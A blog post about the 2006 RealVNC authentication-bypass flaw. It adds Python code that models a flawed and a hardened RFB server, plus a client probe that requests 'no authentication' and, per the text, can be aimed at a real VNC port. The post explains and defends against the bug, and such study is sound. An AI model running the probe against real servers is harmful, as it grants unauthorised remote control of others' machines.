« "Google Suggest" Search Plug-in | Main | OpenWRT on our Linksys WRT54GS »

Authentication Vulnerability in VNC Server

In mid-May 2006 a vulnerability was disclosed in the RealVNC server software that lets a client bypass the authentication step when connecting. VNC is a network protocol that lets clients on a network remotely view and control a computer running a VNC server, such as the RealVNC software affected here. The flaw sits in the protocol's security negotiation: the server acts on the authentication method the client says it will use rather than on the methods the server itself offered, so a client that announces "no authentication" is let in even when the server is configured to require a password. Bypassing authentication means that anyone who can reach the server's port can take control of the computer, regardless of whether they have the authority to do so.
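The negotiation the bug lives in, as an added example that is not part of the original post and is not RealVNC's code: a model of an RFB 3.8 server that, in its flawed form, acts on whatever security type the client names, beside the hardened check that only accepts a type the server actually offered, plus a client-side probe that asks for "None" and reports whether it was let in. The wire constants (version string, security types 1 and 2, the 4-byte SecurityResult) follow the public RFB specification; the server logic, the fixed all-zero challenge, the never-accepted password and the in-process socketpair harness are assumptions made so the example runs offline.

```python
"""Model of RFB 3.8 security-type negotiation: a server that trusts the
client's choice of security type next to one that checks the choice against
the list it offered. Added example; not RealVNC's implementation."""
import socket
import struct
import threading

RFB_VERSION = b"RFB 003.008\n"
SEC_NONE = 1            # security type 1: no authentication
SEC_VNC_AUTH = 2        # security type 2: challenge/response password auth
SECURITY_OK = struct.pack(">I", 0)
SECURITY_FAILED = struct.pack(">I", 1)


def recv_exact(sock, n):
    """Read exactly n bytes or raise; short reads are a classic handshake bug."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during handshake")
        buf += chunk
    return buf


def serve_handshake(sock, offered, check_choice):
    """Server side of the handshake up to the SecurityResult message.

    offered:      security types the server advertises, e.g. [SEC_VNC_AUTH]
    check_choice: True  -> reject any client choice not in `offered`
                  False -> model of the flaw: act on whatever the client picked
    Returns the security type actually used, or None if the client was rejected.
    """
    sock.sendall(RFB_VERSION)
    if recv_exact(sock, 12) != RFB_VERSION:
        sock.close()
        return None
    sock.sendall(bytes([len(offered)] + list(offered)))
    choice = recv_exact(sock, 1)[0]

    if check_choice and choice not in offered:
        sock.sendall(SECURITY_FAILED)   # hardened: an unoffered type is an error
        sock.close()
        return None

    if choice == SEC_NONE:
        sock.sendall(SECURITY_OK)       # the flawed server reaches this without a password
        return SEC_NONE
    if choice == SEC_VNC_AUTH:
        sock.sendall(b"\x00" * 16)      # challenge; a real server sends random bytes
        recv_exact(sock, 16)            # client's DES response, not checked in this model
        sock.sendall(SECURITY_FAILED)   # model assumption: no password is ever accepted
        sock.close()
        return None
    sock.sendall(SECURITY_FAILED)       # unknown type
    sock.close()
    return None


def probe_none_bypass(sock):
    """Client side: request 'None' even though it was not offered and report
    whether the server let us in. True means the bypass worked."""
    if recv_exact(sock, 12) != RFB_VERSION:
        return False
    sock.sendall(RFB_VERSION)
    count = recv_exact(sock, 1)[0]
    offered = list(recv_exact(sock, count))
    if SEC_NONE in offered:
        return False            # server legitimately allows no auth; not the bug under test
    sock.sendall(bytes([SEC_NONE]))
    try:
        result = struct.unpack(">I", recv_exact(sock, 4))[0]
    except ConnectionError:
        return False
    return result == 0


def run_probe(check_choice):
    """Run one probe against an in-process server (password-only configuration)
    over a socketpair; returns (bypassed, security_type_used_by_server)."""
    server_end, client_end = socket.socketpair()
    outcome = {}

    def server():
        outcome["used"] = serve_handshake(server_end, [SEC_VNC_AUTH], check_choice)

    t = threading.Thread(target=server)
    t.start()
    bypassed = probe_none_bypass(client_end)
    t.join()
    client_end.close()
    server_end.close()
    return bypassed, outcome.get("used")


if __name__ == "__main__":
    print("flawed server   -> bypassed:", run_probe(check_choice=False)[0])
    print("hardened server -> bypassed:", run_probe(check_choice=True)[0])
```

The one-line difference between the two server behaviours is the membership check on the client's choice; everything a client sends during negotiation is attacker-controlled, so the server must dispatch on its own offer list, not on the byte it received. Pointing `probe_none_bypass` at a real listener (swap the socketpair for a TCP connection to the VNC port) is the same check a scanner would do.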

Plenty of programs handle authentication in an insecure way, and most of them get away with it by relying on a secure transport (e.g. SSL) to keep credentials safe in transit. That does not help here: tunnelling VNC over an encrypted, authenticated channel such as an SSH session protects the traffic inside the tunnel, but the server is still wide open if the port it listens on is also reachable directly from the public network, because an attacker simply connects to that port and never touches the tunnel. The practical mitigation (a workaround, not a fix for the bug itself) is to run a firewall on the machine that exposes only the SSH port. A client first authenticates to SSH, then forwards a local port through that session to the VNC server's port on the same machine, so the VNC connection arrives over the loop-back interface from behind the firewall. Better still, configure the VNC server to listen on the loop-back address only, so the port stays unreachable even if a firewall rule is later loosened.

This vulnerability is pretty serious, but I think that it provides a good incentive for people to follow better security practices when using VNC servers. The value of firewalls and SSH cannot be emphasized enough.